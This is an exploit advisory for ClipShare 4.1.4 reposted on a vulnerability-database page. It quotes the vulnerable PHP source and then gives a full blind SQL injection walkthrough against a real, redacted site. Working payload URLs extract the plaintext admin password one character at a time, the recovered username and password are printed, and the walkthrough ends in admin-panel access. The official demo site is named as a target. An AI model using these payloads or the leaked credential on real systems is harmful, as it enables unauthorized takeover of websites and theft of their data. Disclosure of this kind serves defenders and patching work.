Vulners
Lucene search
ClipShare 4.1.4 SQL Injection / Plaintext Password
`=====================================================================
Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
Official site: http://www.clip-share.com
Software License: Commercial.
Vulns: Blind SQl injection && Plaintext Password.
======================================================================
AFAIK all versions is vulnerable:
Official Demo is also vulnerable: http://www.clipsharedemo.com/ugroup_videos.php?urlkey=%27%20and%203=%273
Last Checked: 13 March 2013
NOTE:To exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
Vulnerable Script:
//ugroup_videos.php
=========================== BEGIN OF ugroup_videos.php =============================================
<?php
/**************************************************************************************************
| Software Name : ClipShare - Video Sharing Community Script
| Software Author : Clip-Share.Com / ScriptXperts.Com
| Website : http://www.clip-share.com
| E-mail : [email protected]
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/
require('include/config.php');
require('include/function.php');
$urlkey = ( isset($_REQUEST['urlkey']) ) ? $_REQUEST['urlkey'] : NULL;
$uid = ( isset($_REQUEST['UID']) && is_numeric($_REQUEST['UID']) ) ? $_REQUEST['UID'] : NULL;
$sql="SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1";
$rs = $conn->Execute($sql);
if($rs->recordcount()>0) {
STemplate::assign('groupname',$rs->fields[gname]);
//PAGING STARTS
$page = ( isset($_REQUEST['page']) && is_numeric($_REQUEST['page']) ) ? $_REQUEST['page'] : NULL;
$sql = "SELECT count(*) as total from group_mem WHERE GID='" .$rs->fields['GID']. "' limit 1";
$ars = $conn->Execute($sql);
$total = ( $ars->fields['total']<=$config['total_per_ini'] ) ? $ars->fields['total'] : $config['total_per_ini'];
$tpage = ceil($total/$config['items_per_page']);
$spage = ( $tpage == 0 ) ? $tpage+1 : $tpage;
$startfrom = ($page-1)*$config['items_per_page'];
$sql = "SELECT m.*,s.addtime from group_mem as m,signup as s WHERE m.MID=s.UID and m.GID='".$rs->fields['GID']."' limit $startfrom, " .$config['items_per_page'];
$rs = $conn->execute($sql);
if($rs->recordcount()>0)
$vdo = $rs->getrows();
$start_num = $startfrom+1;
$end_num = $startfrom+$rs->recordcount();
$page_link = '';
$type = ( isset($_REQUEST['type']) && $_REQUEST['type'] != '' ) ? "&type=" .$_REQUEST['type'] : NULL;
for ( $k=1;$k<=$tpage;$k++ )
$page_link.="<a href='group_members.php?UID=" .$uid. "&page=" .$k. $type. "'>$k</a> ";
//END PAGING
}
STemplate::assign('err',$err);
STemplate::assign('msg',$msg);
STemplate::assign('page',$page);
STemplate::assign('start_num',$start_num);
STemplate::assign('end_num',$end_num);
STemplate::assign('page_link',$page_link);
STemplate::assign('total',$total);
STemplate::assign('answers',$vdo);
STemplate::assign('head_bottom',"grouplinks.tpl");
STemplate::display('head1.tpl');
STemplate::display('err_msg.tpl');
STemplate::display('ugroup_members.tpl');
STemplate::display('footer.tpl');
STemplate::gzip_encode();
?>
====================END OF ugroup_videos.php========================
Real exploitation example:
_REMOVED_/ugroup_videos.php?urlkey=1' order by 14-- 3='3
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3
//ON TRUE
//RETURNS: NORMAL PAGE
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3
//ON FALSE
// RETURNS NOTHING.(White Page)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=2,0,3))-- 3='3
Plaintext password:
//siteadmin/login.php
============ BEGIN OF siteadmin/login.php ===========================
<?php
include('../include/config.php');
if ( isset($_POST['submit_login']) ) {
$username = trim($_POST['username']);
$password = trim($_POST['password']);
if ( $username == '' or $password == '' ) {
$err = 'Please provide a username and password!';
} else {
$access = false;
$sql = "SELECT soption FROM sconfig WHERE soption = 'admin_name' AND svalue = '" .mysql_real_escape_string($username). "'";
$conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
$sql = "SELECT soption FROM sconfig WHERE soption = 'admin_pass' AND svalue = '" .mysql_real_escape_string($password). "'";
$conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
$access = true;
}
}
// SNIP //
============ END OF siteadmin/login.php ===========================
//TRUE
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)!=0,0,3) from sconfig)-- 3='3
80 user: http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)=80,0,3) from sconfig)-- 3='3
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3
Passi cekirik:
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
11 simvolludur pass.
========================================================
1-ci simvol: o
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
2-ci simvol: (
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
3-cu simvol: 2
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
4-cu simvol: n
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
5-ci simvol: @
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
6-ci simvol: b
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
7-ci simvol: % (yoxla sonra)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
8-ci simvol: h
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
9-cu simvol: a
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
10-cu simvol: 5
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
11-ci simvol: 1
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
========================================================
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
//Parol duzdur tamamile ascii representasionu yoxlamaga ehtiyyac yoxdur.(plaintext oldugundan subhe yaradirdi)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
pass: o(2n@b%ha51
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3
login: admin
pass: o(2n@b%ha51
http://_REMOVED_/siteadmin/
OwnEd.
Tested version:
Tuesday, March 12, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
=========================================
KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
El sallayin :D
ottoman38 & Ferid23 & Metaizm &HERO_AZE & BOT_25 &CAMOUFL4G3
4R!F * Orxan_204 & & SEXAVET & Manifesto & J_OF_R &
& etc.
===========================================
/AkaStep
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Mar 2013 00:00Current
0.2Low risk
Vulners AI Score0.2